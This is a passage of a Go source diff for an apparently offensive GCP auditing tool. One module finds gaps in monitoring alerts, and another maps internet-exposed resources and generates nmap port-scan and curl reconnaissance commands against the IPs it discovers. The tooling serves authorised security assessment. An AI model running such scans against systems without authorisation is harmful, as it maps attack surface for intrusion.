Duration string + Comparison string + Aggregation string +} + +type NotificationChannel struct { + Name string + DisplayName string + ProjectID string + Type string // email, slack, pagerduty, webhook, sms, pubsub + Enabled bool + Verified bool + Labels map[string]string + CreationTime string + MutationTime string +} + +type UptimeCheck struct { + Name string + DisplayName string + ProjectID string + MonitoredHost string + ResourceType string + Protocol string + Port int32 + Path string + Period string + Timeout string + SelectedRegion []string + Enabled bool + SSLEnabled bool +} + +type AlertGap struct { + GapType string // missing-alert, disabled-alert, no-notification + Severity string + Description string + Recommendation string + AffectedArea string +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type MonitoringAlertsModule struct { + gcpinternal.BaseGCPModule + + // Module-specific fields + AlertPolicies []AlertPolicy + NotificationChannels []NotificationChannel + UptimeChecks []UptimeCheck + AlertGaps []AlertGap + LootMap map[string]*internal.LootFile + mu sync.Mutex + + // Tracking for gap analysis + hasIAMChangeAlert bool + hasFirewallChangeAlert bool + hasNetworkChangeAlert bool + hasSAKeyAlert bool + hasAuditLogAlert bool +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type MonitoringAlertsOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o MonitoringAlertsOutput) TableFiles() []internal.TableFile { return o.Table } +func (o MonitoringAlertsOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPMonitoringAlertsCommand(cmd *cobra.Command, args []string) { + // Initialize command context + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, GCP_MONITORINGALERTS_MODULE_NAME) + if err != nil { + return + } + + // Create module instance + module := &MonitoringAlertsModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + AlertPolicies: []AlertPolicy{}, + NotificationChannels: []NotificationChannel{}, + UptimeChecks: []UptimeCheck{}, + AlertGaps: []AlertGap{}, + LootMap: make(map[string]*internal.LootFile), + } + + // Initialize loot files + module.initializeLootFiles() + + // Execute enumeration + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *MonitoringAlertsModule) Execute(ctx context.Context, logger internal.Logger) { + logger.InfoM("Analyzing Cloud Monitoring alerting configuration...", GCP_MONITORINGALERTS_MODULE_NAME) + + // Create Monitoring client + alertClient, err := monitoring.NewAlertPolicyClient(ctx) + if err != nil { + logger.ErrorM(fmt.Sprintf("Failed to create Alert Policy client: %v", err), GCP_MONITORINGALERTS_MODULE_NAME) + return + } + defer alertClient.Close() + + channelClient, err := monitoring.NewNotificationChannelClient(ctx) + if err != nil { + logger.ErrorM(fmt.Sprintf("Failed to create Notification Channel client: %v", err), GCP_MONITORINGALERTS_MODULE_NAME) + return + } + defer channelClient.Close() + + uptimeClient, err := monitoring.NewUptimeCheckClient(ctx) + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.ErrorM(fmt.Sprintf("Failed to create Uptime Check client: %v", err), GCP_MONITORINGALERTS_MODULE_NAME) + } + } + if uptimeClient != nil { + defer uptimeClient.Close() + } + + // Process each project + for _, projectID := range m.ProjectIDs { + m.processProject(ctx, projectID, alertClient, channelClient, uptimeClient, logger) + } + + // Analyze for gaps + m.analyzeAlertGaps(logger) + + // Check results + totalPolicies := len(m.AlertPolicies) + totalChannels := len(m.NotificationChannels) + totalGaps := len(m.AlertGaps) + + if totalPolicies == 0 && totalChannels == 0 { + logger.InfoM("No monitoring alerts or notification channels found", GCP_MONITORINGALERTS_MODULE_NAME) + logger.InfoM("[CRITICAL] Projects have no alerting configured!", GCP_MONITORINGALERTS_MODULE_NAME) + return + } + + logger.SuccessM(fmt.Sprintf("Found %d alert policy(ies), %d notification channel(s)", + totalPolicies, totalChannels), GCP_MONITORINGALERTS_MODULE_NAME) + + if totalGaps > 0 { + logger.InfoM(fmt.Sprintf("[FINDING] Identified %d alerting gap(s)", totalGaps), GCP_MONITORINGALERTS_MODULE_NAME) + } + + // Write output + m.writeOutput(ctx, logger) +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *MonitoringAlertsModule) processProject(ctx context.Context, projectID string, alertClient *monitoring.AlertPolicyClient, channelClient *monitoring.NotificationChannelClient, uptimeClient *monitoring.UptimeCheckClient, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating monitoring for project: %s", projectID), GCP_MONITORINGALERTS_MODULE_NAME) + } + + // List alert policies + m.enumerateAlertPolicies(ctx, projectID, alertClient, logger) + + // List notification channels + m.enumerateNotificationChannels(ctx, projectID, channelClient, logger) + + // List uptime checks + if uptimeClient != nil { + m.enumerateUptimeChecks(ctx, projectID, uptimeClient, logger) + } +} + +func (m *MonitoringAlertsModule) enumerateAlertPolicies(ctx context.Context, projectID string, client *monitoring.AlertPolicyClient, logger internal.Logger) { + parent := fmt.Sprintf("projects/%s", projectID) + + req := &monitoringpb.ListAlertPoliciesRequest{ + Name: parent, + } + + it := client.ListAlertPolicies(ctx, req) + for { + policy, err := it.Next() + if err == iterator.Done { + break + } + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.ErrorM(fmt.Sprintf("Error listing alert policies for project %s: %v", projectID, err), GCP_MONITORINGALERTS_MODULE_NAME) + } + break + } + + alertPolicy := AlertPolicy{ + Name: policy.Name, + DisplayName: policy.DisplayName, + ProjectID: projectID, + Enabled: policy.Enabled.GetValue(), + ConditionCount: len(policy.Conditions), + NotificationCount: len(policy.NotificationChannels), + Combiner: policy.Combiner.String(), + } + + if policy.Documentation != nil { + alertPolicy.Documentation = policy.Documentation.Content + } + + if policy.CreationRecord != nil { + alertPolicy.CreationRecord = policy.CreationRecord.MutateTime.AsTime().String() + } + + if policy.MutationRecord != nil { + alertPolicy.MutationRecord = policy.MutationRecord.MutateTime.AsTime().String() + } + + // Severity from user labels or documentation + if policy.UserLabels != nil { + if sev, ok := policy.UserLabels["severity"]; ok { + alertPolicy.Severity = sev + } + } + + // Parse conditions + for _, cond := range policy.Conditions { + condition := AlertCondition{ + Name: cond.Name, + DisplayName: cond.DisplayName, + } + + // Parse based on condition type + switch c := cond.Condition.(type) { + case *monitoringpb.AlertPolicy_Condition_ConditionThreshold: + if c.ConditionThreshold != nil { + condition.Filter = c.ConditionThreshold.Filter + condition.Comparison = c.ConditionThreshold.Comparison.String() + condition.ThresholdValue = c.ConditionThreshold.ThresholdValue + + if c.ConditionThreshold.Duration != nil { + condition.Duration = c.ConditionThreshold.Duration.String() + } + + // Extract metric type from filter + condition.MetricType = m.extractMetricType(c.ConditionThreshold.Filter) + } + case *monitoringpb.AlertPolicy_Condition_ConditionAbsent: + if c.ConditionAbsent != nil { + condition.Filter = c.ConditionAbsent.Filter + condition.MetricType = m.extractMetricType(c.ConditionAbsent.Filter) + } + case *monitoringpb.AlertPolicy_Condition_ConditionMonitoringQueryLanguage: + if c.ConditionMonitoringQueryLanguage != nil { + condition.Filter = c.ConditionMonitoringQueryLanguage.Query + } + } + + alertPolicy.Conditions = append(alertPolicy.Conditions, condition) + + // Check for security-related alerts + m.checkSecurityAlert(condition.Filter, condition.DisplayName) + } + + m.mu.Lock() + m.AlertPolicies = append(m.AlertPolicies, alertPolicy) + m.mu.Unlock() + } +} + +func (m *MonitoringAlertsModule) enumerateNotificationChannels(ctx context.Context, projectID string, client *monitoring.NotificationChannelClient, logger internal.Logger) { + parent := fmt.Sprintf("projects/%s", projectID) + + req := &monitoringpb.ListNotificationChannelsRequest{ + Name: parent, + } + + it := client.ListNotificationChannels(ctx, req) + for { + channel, err := it.Next() + if err == iterator.Done { + break + } + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.ErrorM(fmt.Sprintf("Error listing notification channels for project %s: %v", projectID, err), GCP_MONITORINGALERTS_MODULE_NAME) + } + break + } + + notifChannel := NotificationChannel{ + Name: channel.Name, + DisplayName: channel.DisplayName, + ProjectID: projectID, + Type: channel.Type, + Enabled: channel.Enabled.GetValue(), + Labels: channel.Labels, + } + + // Check verification status + if channel.VerificationStatus == monitoringpb.NotificationChannel_VERIFIED { + notifChannel.Verified = true + } + + if channel.CreationRecord != nil { + notifChannel.CreationTime = channel.CreationRecord.MutateTime.AsTime().String() + } + + // MutationRecords is a slice - get the most recent one + if len(channel.MutationRecords) > 0 { + lastMutation := channel.MutationRecords[len(channel.MutationRecords)-1] + if lastMutation != nil { + notifChannel.MutationTime = lastMutation.MutateTime.AsTime().String() + } + } + + m.mu.Lock() + m.NotificationChannels = append(m.NotificationChannels, notifChannel) + m.mu.Unlock() + } +} + +func (m *MonitoringAlertsModule) enumerateUptimeChecks(ctx context.Context, projectID string, client *monitoring.UptimeCheckClient, logger internal.Logger) { + parent := fmt.Sprintf("projects/%s", projectID) + + req := &monitoringpb.ListUptimeCheckConfigsRequest{ + Parent: parent, + } + + it := client.ListUptimeCheckConfigs(ctx, req) + for { + check, err := it.Next() + if err == iterator.Done { + break + } + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.ErrorM(fmt.Sprintf("Error listing uptime checks for project %s: %v", projectID, err), GCP_MONITORINGALERTS_MODULE_NAME) + } + break + } + + uptimeCheck := UptimeCheck{ + Name: check.Name, + DisplayName: check.DisplayName, + ProjectID: projectID, + } + + // Parse resource type + switch r := check.Resource.(type) { + case *monitoringpb.UptimeCheckConfig_MonitoredResource: + if r.MonitoredResource != nil { + uptimeCheck.ResourceType = r.MonitoredResource.Type + if host, ok := r.MonitoredResource.Labels["host"]; ok { + uptimeCheck.MonitoredHost = host + } + } + } + + // Parse check request details + switch cr := check.CheckRequestType.(type) { + case *monitoringpb.UptimeCheckConfig_HttpCheck_: + if cr.HttpCheck != nil { + uptimeCheck.Protocol = "HTTP" + uptimeCheck.Port = cr.HttpCheck.Port + uptimeCheck.Path = cr.HttpCheck.Path + if cr.HttpCheck.UseSsl { + uptimeCheck.Protocol = "HTTPS" + uptimeCheck.SSLEnabled = true + } + } + case *monitoringpb.UptimeCheckConfig_TcpCheck_: + if cr.TcpCheck != nil { + uptimeCheck.Protocol = "TCP" + uptimeCheck.Port = cr.TcpCheck.Port + } + } + + if check.Period != nil { + uptimeCheck.Period = check.Period.String() + } + + if check.Timeout != nil { + uptimeCheck.Timeout = check.Timeout.String() + } + + // Check regions + for _, region := range check.SelectedRegions { + uptimeCheck.SelectedRegion = append(uptimeCheck.SelectedRegion, region.String()) + } + + m.mu.Lock() + m.UptimeChecks = append(m.UptimeChecks, uptimeCheck) + m.mu.Unlock() + } +} + +// ------------------------------ +// Security Alert Detection +// ------------------------------ +func (m *MonitoringAlertsModule) checkSecurityAlert(filter, displayName string) { + filterLower := strings.ToLower(filter) + nameLower := strings.ToLower(displayName) + + // IAM policy changes + if strings.Contains(filterLower, "setiampolicy") || + strings.Contains(filterLower, "iam_policy") || + strings.Contains(nameLower, "iam") { + m.mu.Lock() + m.hasIAMChangeAlert = true + m.mu.Unlock() + } + + // Firewall changes + if strings.Contains(filterLower, "compute.firewalls") || + strings.Contains(filterLower, "firewall") || + strings.Contains(nameLower, "firewall") { + m.mu.Lock() + m.hasFirewallChangeAlert = true + m.mu.Unlock() + } + + // Network changes + if strings.Contains(filterLower, "compute.networks") || + strings.Contains(filterLower, "vpc") || + strings.Contains(nameLower, "network") { + m.mu.Lock() + m.hasNetworkChangeAlert = true + m.mu.Unlock() + } + + // Service account key creation + if strings.Contains(filterLower, "serviceaccountkeys") || + strings.Contains(filterLower, "service_account_key") || + strings.Contains(nameLower, "service account key") { + m.mu.Lock() + m.hasSAKeyAlert = true + m.mu.Unlock() + } + + // Audit log configuration + if strings.Contains(filterLower, "auditconfig") || + strings.Contains(filterLower, "audit_config") || + strings.Contains(nameLower, "audit") { + m.mu.Lock() + m.hasAuditLogAlert = true + m.mu.Unlock() + } +} + +// ------------------------------ +// Gap Analysis +// ------------------------------ +func (m *MonitoringAlertsModule) analyzeAlertGaps(logger internal.Logger) { + // Check for disabled alerts + for _, policy := range m.AlertPolicies { + if !policy.Enabled { + gap := AlertGap{ + GapType: "disabled-alert", + Severity: "MEDIUM", + Description: fmt.Sprintf("Alert policy '%s' is disabled", policy.DisplayName), + Recommendation: fmt.Sprintf("Enable the alert policy if it's still needed: gcloud alpha monitoring policies update %s --enabled", policy.Name), + AffectedArea: policy.DisplayName, + } + m.AlertGaps = append(m.AlertGaps, gap) + } + + // Check for alerts without notifications + if policy.NotificationCount == 0 && policy.Enabled { + gap := AlertGap{ + GapType: "no-notification", + Severity: "HIGH", + Description: fmt.Sprintf("Alert policy '%s' has no notification channels", policy.DisplayName), + Recommendation: "Add notification channels to ensure alerts are received", + AffectedArea: policy.DisplayName, + } + m.AlertGaps = append(m.AlertGaps, gap) + } + } + + // Check for unverified notification channels + for _, channel := range m.NotificationChannels { + if !channel.Verified && channel.Enabled { + gap := AlertGap{ + GapType: "unverified-channel", + Severity: "MEDIUM", + Description: fmt.Sprintf("Notification channel '%s' (%s) is not verified", channel.DisplayName, channel.Type), + Recommendation: "Verify the notification channel to ensure alerts are delivered", + AffectedArea: channel.DisplayName, + } + m.AlertGaps = append(m.AlertGaps, gap) + } + + if !channel.Enabled { + gap := AlertGap{ + GapType: "disabled-channel", + Severity: "LOW", + Description: fmt.Sprintf("Notification channel '%s' is disabled", channel.DisplayName), + Recommendation: "Enable or remove unused notification channels", + AffectedArea: channel.DisplayName, + } + m.AlertGaps = append(m.AlertGaps, gap) + } + } + + // Check for missing security alerts + if !m.hasIAMChangeAlert { + gap := AlertGap{ + GapType: "missing-alert", + Severity: "HIGH", + Description: "No alert policy for IAM policy changes", + Recommendation: "Create an alert for protoPayload.methodName=\"SetIamPolicy\"", + AffectedArea: "IAM Security", + } + m.AlertGaps = append(m.AlertGaps, gap) + m.addMissingAlertToLoot("IAM Policy Changes", `resource.type="project" AND protoPayload.methodName="SetIamPolicy"`) + } + + if !m.hasFirewallChangeAlert { + gap := AlertGap{ + GapType: "missing-alert", + Severity: "HIGH", + Description: "No alert policy for firewall rule changes", + Recommendation: "Create an alert for compute.firewalls.* methods", + AffectedArea: "Network Security", + } + m.AlertGaps = append(m.AlertGaps, gap) + m.addMissingAlertToLoot("Firewall Changes", `resource.type="gce_firewall_rule" AND protoPayload.methodName=~"compute.firewalls.*"`) + } + + if !m.hasNetworkChangeAlert { + gap := AlertGap{ + GapType: "missing-alert", + Severity: "MEDIUM", + Description: "No alert policy for VPC network changes", + Recommendation: "Create an alert for compute.networks.* methods", + AffectedArea: "Network Security", + } + m.AlertGaps = append(m.AlertGaps, gap) + m.addMissingAlertToLoot("VPC Network Changes", `resource.type="gce_network" AND protoPayload.methodName=~"compute.networks.*"`) + } + + if !m.hasSAKeyAlert { + gap := AlertGap{ + GapType: "missing-alert", + Severity: "HIGH", + Description: "No alert policy for service account key creation", + Recommendation: "Create an alert for CreateServiceAccountKey method", + AffectedArea: "IAM Security", + } + m.AlertGaps = append(m.AlertGaps, gap) + m.addMissingAlertToLoot("Service Account Key Creation", `protoPayload.methodName="google.iam.admin.v1.CreateServiceAccountKey"`) + } + + if !m.hasAuditLogAlert { + gap := AlertGap{ + GapType: "missing-alert", + Severity: "MEDIUM", + Description: "No alert policy for audit configuration changes", + Recommendation: "Create an alert for SetIamPolicy on audit configs", + AffectedArea: "Logging Security", + } + m.AlertGaps = append(m.AlertGaps, gap) + m.addMissingAlertToLoot("Audit Configuration Changes", `protoPayload.methodName="SetIamPolicy" AND protoPayload.serviceData.policyDelta.auditConfigDeltas:*`) + } + + // Check if no notification channels exist at all + if len(m.NotificationChannels) == 0 && len(m.AlertPolicies) > 0 { + gap := AlertGap{ + GapType: "missing-alert", + Severity: "CRITICAL", + Description: "No notification channels configured", + Recommendation: "Create notification channels (email, Slack, PagerDuty) to receive alerts", + AffectedArea: "Alert Delivery", + } + m.AlertGaps = append(m.AlertGaps, gap) + } +} + +func (m *MonitoringAlertsModule) addMissingAlertToLoot(alertName, filter string) { + m.mu.Lock() + defer m.mu.Unlock() + + m.LootMap["missing-alerts"].Contents += fmt.Sprintf( + "## Missing Alert: %s\n"+ + "Recommended Filter:\n"+ + "%s\n\n"+ + "# Create with gcloud:\n"+ + "# gcloud alpha monitoring policies create --display-name=\"%s\" \\\n"+ + "# --condition-filter=\"%s\"\n\n", + alertName, filter, alertName, filter, + ) +} + +// ------------------------------ +// Helper Functions +// ------------------------------ +func (m *MonitoringAlertsModule) extractMetricType(filter string) string { + // Extract metric type from filter string + // Format: metric.type="..." or resource.type="..." + if strings.Contains(filter, "metric.type=") { + parts := strings.Split(filter, "metric.type=") + if len(parts) > 1 { + metricPart := strings.Split(parts[1], " ")[0] + return strings.Trim(metricPart, "\"") + } + } + return "" +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *MonitoringAlertsModule) initializeLootFiles() { + m.LootMap["disabled-alerts"] = &internal.LootFile{ + Name: "disabled-alerts", + Contents: "# Disabled Alert Policies\n# Generated by CloudFox\n\n", + } + m.LootMap["missing-alerts"] = &internal.LootFile{ + Name: "missing-alerts", + Contents: "# Missing Security Alerts\n# Generated by CloudFox\n# Recommended alerts for security monitoring\n\n", + } + m.LootMap["alert-setup-commands"] = &internal.LootFile{ + Name: "alert-setup-commands", + Contents: "# Alert Setup Commands\n# Generated by CloudFox\n\n", + } + m.LootMap["notification-channels"] = &internal.LootFile{ + Name: "notification-channels", + Contents: "# Notification Channels\n# Generated by CloudFox\n\n", + } +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *MonitoringAlertsModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Sort policies by enabled status and name + sort.Slice(m.AlertPolicies, func(i, j int) bool { + if m.AlertPolicies[i].Enabled != m.AlertPolicies[j].Enabled { + return m.AlertPolicies[i].Enabled + } + return m.AlertPolicies[i].DisplayName < m.AlertPolicies[j].DisplayName + }) + + // Alert Policies table + policiesHeader := []string{ + "Policy", + "Project", + "Enabled", + "Conditions", + "Notifications", + "Combiner", + } + + var policiesBody [][]string + for _, p := range m.AlertPolicies { + enabled := "No" + if p.Enabled { + enabled = "Yes" + } + + policiesBody = append(policiesBody, []string{ + truncateString(p.DisplayName, 40), + p.ProjectID, + enabled, + fmt.Sprintf("%d", p.ConditionCount), + fmt.Sprintf("%d", p.NotificationCount), + p.Combiner, + }) + + // Add disabled alerts to loot + if !p.Enabled { + m.LootMap["disabled-alerts"].Contents += fmt.Sprintf( + "## %s\n"+ + "Project: %s\n"+ + "Name: %s\n"+ + "# Enable: gcloud alpha monitoring policies update %s --enabled\n\n", + p.DisplayName, p.ProjectID, p.Name, p.Name, + ) + } + } + + // Notification Channels table + channelsHeader := []string{ + "Channel", + "Project", + "Type", + "Enabled", + "Verified", + } + + var channelsBody [][]string + for _, c := range m.NotificationChannels { + enabled := "No" + if c.Enabled { + enabled = "Yes" + } + verified := "No" + if c.Verified { + verified = "Yes" + } + + channelsBody = append(channelsBody, []string{ + truncateString(c.DisplayName, 40), + c.ProjectID, + c.Type, + enabled, + verified, + }) + + // Add to notification channels loot + m.LootMap["notification-channels"].Contents += fmt.Sprintf( + "%s (%s) - Enabled: %t, Verified: %t\n", + c.DisplayName, c.Type, c.Enabled, c.Verified, + ) + } + + // Alert Gaps table + gapsHeader := []string{ + "Gap Type", + "Severity", + "Affected Area", + "Description", + } + + var gapsBody [][]string + for _, g := range m.AlertGaps { + gapsBody = append(gapsBody, []string{ + g.GapType, + g.Severity, + g.AffectedArea, + truncateString(g.Description, 50), + }) + + // Add setup commands to loot + if g.Recommendation != "" { + m.LootMap["alert-setup-commands"].Contents += fmt.Sprintf( + "# %s (%s)\n# %s\n%s\n\n", + g.AffectedArea, g.GapType, g.Description, g.Recommendation, + ) + } + } + + // Uptime Checks table + uptimeHeader := []string{ + "Check", + "Project", + "Host", + "Protocol", + "Port", + "Period", + } + + var uptimeBody [][]string + for _, u := range m.UptimeChecks { + uptimeBody = append(uptimeBody, []string{ + truncateString(u.DisplayName, 30), + u.ProjectID, + truncateString(u.MonitoredHost, 30), + u.Protocol, + fmt.Sprintf("%d", u.Port), + u.Period, + }) + } + + // Collect loot files + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + // Build tables + tables := []internal.TableFile{ + { + Name: "alerting-policies", + Header: policiesHeader, + Body: policiesBody, + }, + } + + if len(channelsBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "notification-channels", + Header: channelsHeader, + Body: channelsBody, + }) + } + + if len(gapsBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "alert-gaps", + Header: gapsHeader, + Body: gapsBody, + }) + } + + if len(uptimeBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "uptime-checks", + Header: uptimeHeader, + Body: uptimeBody, + }) + } + + output := MonitoringAlertsOutput{ + Table: tables, + Loot: lootFiles, + } + + // Write output + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + m.ProjectIDs, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), GCP_MONITORINGALERTS_MODULE_NAME) + m.CommandCounter.Error++ + } +} diff --git a/gcp/commands/networkexposure.go b/gcp/commands/networkexposure.go new file mode 100644 index 00000000..0e23bed4 --- /dev/null +++ b/gcp/commands/networkexposure.go @@ -0,0 +1,757 @@ +package commands + +import ( + "context" + "fmt" + "sort" + "strings" + "sync" + + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" + + compute "google.golang.org/api/compute/v1" + run "google.golang.org/api/run/v1" +) + +// Module name constant +const GCP_NETWORKEXPOSURE_MODULE_NAME string = "network-exposure" + +var GCPNetworkExposureCommand = &cobra.Command{ + Use: GCP_NETWORKEXPOSURE_MODULE_NAME, + Aliases: []string{"exposure", "public", "internet-facing"}, + Short: "Comprehensive view of all internet-exposed resources with risk scoring", + Long: `Enumerate all internet-facing resources in GCP with risk-based analysis. + +Features: +- Aggregates all public endpoints (Compute, Load Balancers, Cloud Run, Functions) +- Analyzes firewall rules for exposed ports +- Identifies exposed management ports (SSH, RDP, databases) +- Checks TLS/SSL configuration +- Risk-based prioritization +- Maps attack surface across projects +- Generates exploitation commands for penetration testing + +This module combines data from multiple sources to provide a complete picture +of the internet-facing attack surface.`, + Run: runGCPNetworkExposureCommand, +} + +// ------------------------------ +// Data Structures +// ------------------------------ + +type ExposedResource struct { + ResourceType string // "compute_instance", "load_balancer", "cloud_run", "cloud_function", etc. + ResourceName string + ProjectID string + ExternalIP string + FQDN string + ExposedPorts []string + Protocol string + ServiceAccount string + TLSEnabled bool + TLSVersion string + RiskLevel string // CRITICAL, HIGH, MEDIUM, LOW + RiskReasons []string + ExploitCommand string +} + +type FirewallExposure struct { + RuleName string + ProjectID string + Network string + Direction string + Action string + SourceRanges []string + Ports []string + Protocol string + TargetTags []string + IsPublic bool // 0.0.0.0/0 + RiskLevel string + RiskReasons []string +} + +type ExposureSummary struct { + ResourceType string + Count int + CriticalCount int + HighCount int +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type NetworkExposureModule struct { + gcpinternal.BaseGCPModule + + ExposedResources []ExposedResource + FirewallExposures []FirewallExposure + Summaries []ExposureSummary + LootMap map[string]*internal.LootFile + mu sync.Mutex +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type NetworkExposureOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o NetworkExposureOutput) TableFiles() []internal.TableFile { return o.Table } +func (o NetworkExposureOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPNetworkExposureCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, GCP_NETWORKEXPOSURE_MODULE_NAME) + if err != nil { + return + } + + module := &NetworkExposureModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ExposedResources: []ExposedResource{}, + FirewallExposures: []FirewallExposure{}, + Summaries: []ExposureSummary{}, + LootMap: make(map[string]*internal.LootFile), + } + + module.initializeLootFiles() + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *NetworkExposureModule) Execute(ctx context.Context, logger internal.Logger) { + logger.InfoM("Mapping network exposure across all resources...", GCP_NETWORKEXPOSURE_MODULE_NAME) + + // Process each project + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, GCP_NETWORKEXPOSURE_MODULE_NAME, m.processProject) + + // Check results + if len(m.ExposedResources) == 0 && len(m.FirewallExposures) == 0 { + logger.InfoM("No exposed resources found", GCP_NETWORKEXPOSURE_MODULE_NAME) + return + } + + // Generate summaries + m.generateSummaries() + + // Count by risk level + criticalCount := 0 + highCount := 0 + for _, r := range m.ExposedResources { + switch r.RiskLevel { + case "CRITICAL": + criticalCount++ + case "HIGH": + highCount++ + } + } + + logger.SuccessM(fmt.Sprintf("Found %d exposed resource(s) and %d firewall exposure(s): %d CRITICAL, %d HIGH", + len(m.ExposedResources), len(m.FirewallExposures), criticalCount, highCount), GCP_NETWORKEXPOSURE_MODULE_NAME) + + m.writeOutput(ctx, logger) +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *NetworkExposureModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Analyzing network exposure in project: %s", projectID), GCP_NETWORKEXPOSURE_MODULE_NAME) + } + + // 1. Find exposed compute instances + m.findExposedInstances(ctx, projectID, logger) + + // 2. Find exposed load balancers + m.findExposedLoadBalancers(ctx, projectID, logger) + + // 3. Find exposed Cloud Run services + m.findExposedCloudRun(ctx, projectID, logger) + + // 4. Analyze firewall rules for public exposure + m.analyzeFirewallExposure(ctx, projectID, logger) +} + +// findExposedInstances finds compute instances with external IPs +func (m *NetworkExposureModule) findExposedInstances(ctx context.Context, projectID string, logger internal.Logger) { + computeService, err := compute.NewService(ctx) + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.ErrorM(fmt.Sprintf("Error creating Compute service: %v", err), GCP_NETWORKEXPOSURE_MODULE_NAME) + } + return + } + + // List all instances across zones + req := computeService.Instances.AggregatedList(projectID) + err = req.Pages(ctx, func(page *compute.InstanceAggregatedList) error { + for _, scopedList := range page.Items { + if scopedList.Instances == nil { + continue + } + for _, instance := range scopedList.Instances { + // Check for external IP + for _, ni := range instance.NetworkInterfaces { + for _, ac := range ni.AccessConfigs { + if ac.NatIP != "" { + exposed := ExposedResource{ + ResourceType: "compute_instance", + ResourceName: instance.Name, + ProjectID: projectID, + ExternalIP: ac.NatIP, + Protocol: "TCP/UDP", + } + + // Get service account + if len(instance.ServiceAccounts) > 0 { + exposed.ServiceAccount = instance.ServiceAccounts[0].Email + } + + // Determine risk level + exposed.RiskLevel, exposed.RiskReasons = m.classifyInstanceRisk(instance) + + // Generate exploit command + exposed.ExploitCommand = fmt.Sprintf("nmap -Pn -p- %s", ac.NatIP) + + m.mu.Lock() + m.ExposedResources = append(m.ExposedResources, exposed) + m.addExposedResourceToLoot(exposed) + m.mu.Unlock() + } + } + } + } + } + return nil + }) + + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.ErrorM(fmt.Sprintf("Error listing instances: %v", err), GCP_NETWORKEXPOSURE_MODULE_NAME) + } + } +} + +// findExposedLoadBalancers finds load balancers with external IPs +func (m *NetworkExposureModule) findExposedLoadBalancers(ctx context.Context, projectID string, logger internal.Logger) { + computeService, err := compute.NewService(ctx) + if err != nil { + return + } + + // List global forwarding rules (external load balancers) + req := computeService.GlobalForwardingRules.List(projectID) + err = req.Pages(ctx, func(page *compute.ForwardingRuleList) error { + for _, rule := range page.Items { + if rule.IPAddress != "" { + exposed := ExposedResource{ + ResourceType: "load_balancer", + ResourceName: rule.Name, + ProjectID: projectID, + ExternalIP: rule.IPAddress, + ExposedPorts: []string{rule.PortRange}, + Protocol: rule.IPProtocol, + TLSEnabled: strings.ToLower(rule.IPProtocol) == "https" || rule.PortRange == "443", + } + + // Determine risk level + exposed.RiskLevel = "MEDIUM" + exposed.RiskReasons = []string{"External load balancer"} + + if !exposed.TLSEnabled && rule.PortRange != "80" { + exposed.RiskLevel = "HIGH" + exposed.RiskReasons = append(exposed.RiskReasons, "No TLS/HTTPS") + } + + exposed.ExploitCommand = fmt.Sprintf("curl -v http://%s", rule.IPAddress) + + m.mu.Lock() + m.ExposedResources = append(m.ExposedResources, exposed) + m.addExposedResourceToLoot(exposed) + m.mu.Unlock() + } + } + return nil + }) + + if err != nil && globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.ErrorM(fmt.Sprintf("Error listing forwarding rules: %v", err), GCP_NETWORKEXPOSURE_MODULE_NAME) + } +} + +// findExposedCloudRun finds Cloud Run services with public access +func (m *NetworkExposureModule) findExposedCloudRun(ctx context.Context, projectID string, logger internal.Logger) { + runService, err := run.NewService(ctx) + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.ErrorM(fmt.Sprintf("Error creating Cloud Run service: %v", err), GCP_NETWORKEXPOSURE_MODULE_NAME) + } + return + } + + // List Cloud Run services + parent := fmt.Sprintf("projects/%s/locations/-", projectID) + resp, err := 